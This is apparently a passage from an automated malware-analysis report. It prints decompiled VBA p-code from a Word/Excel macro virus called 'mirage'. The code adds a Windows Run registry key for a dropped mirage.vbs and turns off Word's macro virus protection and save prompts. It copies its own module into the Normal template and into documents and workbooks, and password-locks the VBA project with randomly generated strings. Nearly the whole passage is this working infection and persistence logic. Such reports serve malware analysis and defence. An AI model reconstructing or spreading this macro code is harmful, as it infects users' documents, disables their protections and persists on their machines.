' 	LitStr 0x0078 "WSHShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel\Options6","""
' 	PrintItemNL 
' Line #38:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #39:
' 	LitStr 0x0006 "WINDIR"
' 	ArgsLd Environ 0x0001 
' 	LitStr 0x0012 "\SYSTEM\mirage.vbs"
' 	Concat 
' 	LitStr 0x0000 ""
' 	LitStr 0x0040 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
' 	LitStr 0x0006 "MIRAGE"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #40:
' 	GoTo 1 
' Line #41:
' 	End 
' Line #42:
' 	Label tyda 
' Line #43:
' 	ArgsCall Document_New 0x0000 
' Line #44:
' 	Ld ActiveDocument 
' 	MemLd ReadOnly 
' 	LitVarSpecial (True)
' 	Eq 
' 	IfBlock 
' Line #45:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #46:
' 	Ld ActiveDocument 
' 	ArgsMemCall Reload 0x0000 
' Line #47:
' 	EndIfBlock 
' Line #48:
' 	Ld DOT 
' 	LitVarSpecial (True)
' 	Eq 
' 	Ld DOC 
' 	LitVarSpecial (True)
' 	Eq 
' 	And 
' 	If 
' 	BoSImplicit 
' 	GoTo 1 
' 	EndIf 
' Line #49:
' 	Ld DOT 
' 	LitVarSpecial (False)
' 	Eq 
' 	IfBlock 
' Line #50:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St VV 
' Line #51:
' 	StartWithExpr 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	With 
' Line #52:
' 	LitDI2 0x0001 
' 	MemLdWith CountOfLines 
' 	ArgsMemCallWith DeleteLines 0x0002 
' 	BoS 0x0000 
' 	Ld VV 
' 	ArgsMemCallWith AddFromString 0x0001 
' Line #53:
' 	EndWith 
' Line #54:
' 	EndIfBlock 
' Line #55:
' 	Ld DOC 
' 	LitVarSpecial (False)
' 	Eq 
' 	IfBlock 
' Line #56:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St CC 
' Line #57:
' 	StartWithExpr 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	With 
' Line #58:
' 	LitDI2 0x0001 
' 	MemLdWith CountOfLines 
' 	ArgsMemCallWith DeleteLines 0x0002 
' 	BoS 0x0000 
' 	Ld CC 
' 	ArgsMemCallWith AddFromString 0x0001 
' Line #59:
' 	EndWith 
' Line #60:
' 	EndIfBlock 
' Line #61:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	Ld wdOpenFormatDocument 
' 	Eq 
' 	IfBlock 
' Line #62:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	Ld ActiveDocument 
' 	ArgsMemCall SaveAs 0x0001 
' Line #63:
' 	EndIfBlock 
' Line #64:
' 	LineNum 1 
' 	BoS 0x0003 
' 	LitVarSpecial (True)
' 	Ld ActiveDocument 
' 	MemSt Saved 
' Line #65:
' 	ArgsCall PSW_ 0x0000 
' Line #66:
' 	EndSub 
' Line #67:
' 	FuncDefn (Private Sub Workbook_Open())
' Line #68:
' 	OnError (Resume Next) 
' Line #69:
' 	ArgsCall Document_New 0x0000 
' Line #70:
' 	SetStmt 
' 	LitStr 0x000C "ThisWorkbook"
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set BN 
' Line #71:
' 	SetStmt 
' 	ParamOmitted 
' 	LitStr 0x0010 "Word.Application"
' 	ArgsLd GetObject 0x0002 
' 	Set mirage 
' Line #72:
' 	Ld mirage 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #73:
' 	SetStmt 
' 	LitStr 0x0010 "Word.Application"
' 	ArgsLd CreateObject 0x0001 
' 	Set mirage 
' Line #74:
' 	LitVarSpecial (True)
' 	St Wordz 
' Line #75:
' 	EndIfBlock 
' Line #76:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld mirage 
' 	MemLd NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set GH 
' Line #77:
' 	LitDI2 0x0003 
' 	LitDI2 0x0001 
' 	Ld GH 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0007 "mirage:"
' 	Ne 
' 	IfBlock 
' Line #78:
' 	LitDI2 0x0000 
' 	Ld mirage 
' 	MemLd Options 
' 	MemSt VirusProtection 
' Line #79:
' 	LitDI2 0x0000 
' 	Ld mirage 
' 	MemLd Options 
' 	MemSt SaveNormalPrompt 
' Line #80:
' 	LitDI2 0x0001 
' 	Ld GH 
' 	MemLd CountOfLines 
' 	Ld GH 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #81:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld BN 
' 	MemLd CountOfLines 
' 	Ld BN 
' 	ArgsMemLd Lines 0x0002 
' 	Ld GH 
' 	ArgsMemCall InsertLines 0x0002 
' Line #82:
' 	SetStmt 
' 	LitNothing 
' 	Set GH 
' Line #83:
' 	EndIfBlock 
' Line #84:
' 	Ld Wordz 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld mirage 
' 	ArgsMemCall Quit 0x0000 
' 	EndIf 
' Line #85:
' 	ArgsCall PSW_ 0x0000 
' Line #86:
' 	EndSub 
' Line #87:
' 	FuncDefn (Private Sub Document_Close())
' Line #88:
' 	OnError (Resume Next) 
' Line #89:
' 	LitDI2 0x0000 
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #90:
' 	ArgsCall Document_New 0x0000 
' Line #91:
' 	Ld ActiveDocument 
' 	MemLd New 
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	End 
' 	EndIf 
' Line #92:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St False 
' Line #93:
' 	Ld False 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0002 
' 	St YYY 
' Line #94:
' 	Ld ActiveDocument 
' 	MemLd Saved 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo 1 
' 	Else 
' 	BoSImplicit 
' 	GoTo 2 
' 	EndIf 
' Line #95:
' 	LineNum 1 
' 	BoS 0x0003 
' 	LitDI2 0x0003 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0007 "mirage:"
' 	Ne 
' 	IfBlock 
' 	QuoteRem 0x005D 0x0007 " GoTo 2"
' Line #96:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St NN 
' Line #97:
' 	StartWithExpr 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	With 
' Line #98:
' 	LitDI2 0x0001 
' 	MemLdWith CountOfLines 
' 	ArgsMemCallWith DeleteLines 0x0002 
' 	BoS 0x0000 
' 	Ld NN 
' 	ArgsMemCallWith AddFromString 0x0001 
' Line #99:
' 	EndWith 
' Line #100:
' 	StartForVariable 
' 	Ld P 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0005 
' 	For 
' Line #101:
' 	ArgsLd Rnd 0x0000 
' 	LitDI2 0x005A 
' 	LitDI2 0x0042 
' 	Sub 
' 	Paren 
' 	Mul 
' 	LitDI2 0x0041 
' 	Add 
' 	FnInt 
' 	St L 
' 	BoS 0x0000 
' 	ArgsLd Rnd 0x0000 
' 	LitDI2 0x0039 
' 	LitDI2 0x0031 
' 	Sub 
' 	Paren 
' 	Mul 
' 	LitDI2 0x0030 
' 	Add 
' 	FnInt 
' 	St z 
' 	BoS 0x0000 
' 	ArgsLd Rnd 0x0000 
' 	LitDI2 0x007A 
' 	LitDI2 0x0062 
' 	Sub 
' 	Paren 
' 	Mul 
' 	LitDI2 0x0061 
' 	Add 
' 	FnInt 
' 	St S 
' Line #102:
' 	Ld GenPas 
' 	Ld L 
' 	ArgsLd Chr$ 0x0001 
' 	Add 
' 	Ld z 
' 	ArgsLd Chr$ 0x0001 
' 	Add 
' 	Ld S 
' 	ArgsLd Chr$ 0x0001 
' 	Add 
' 	St GenPas 
' Line #103:
' 	StartForVariable 
' 	Next 
' Line #104:
' 	LitDI2 0x0001 
' 	LitStr 0x0001 "'"
' 	Ld GenPas 
' 	Concat 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
…

Open this report in the interactive analyzer, or submit your own file for analysis.